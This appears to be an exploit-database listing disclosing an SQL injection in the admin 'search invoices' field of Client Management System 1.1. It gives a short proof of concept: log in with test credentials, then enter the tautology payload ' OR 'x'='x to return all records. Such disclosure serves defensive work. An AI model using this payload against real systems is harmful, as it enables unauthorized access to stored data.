Client management system 1.1 search sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-06-15 |
Type : webapps |
Platform : tru64
This exploit / vulnerability Client management system 1.1 search sql injection is for educational purposes only and if it is used you will do on your own risk!
Client Management System 1.1 is vulnerable to SQL Injection in the admin panel 'search invoices' field because of insufficient user supplied data sanitization.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/clientms/admin/index.php
2) Login as admin using test credentials: admin/Test@123
3) Goto: http://localhost/clientms/admin/search-invoices.php
4) Enter the following payload in the search field: ' OR 'x'='x
5) All results are showed instead of none ==> SQL Injection success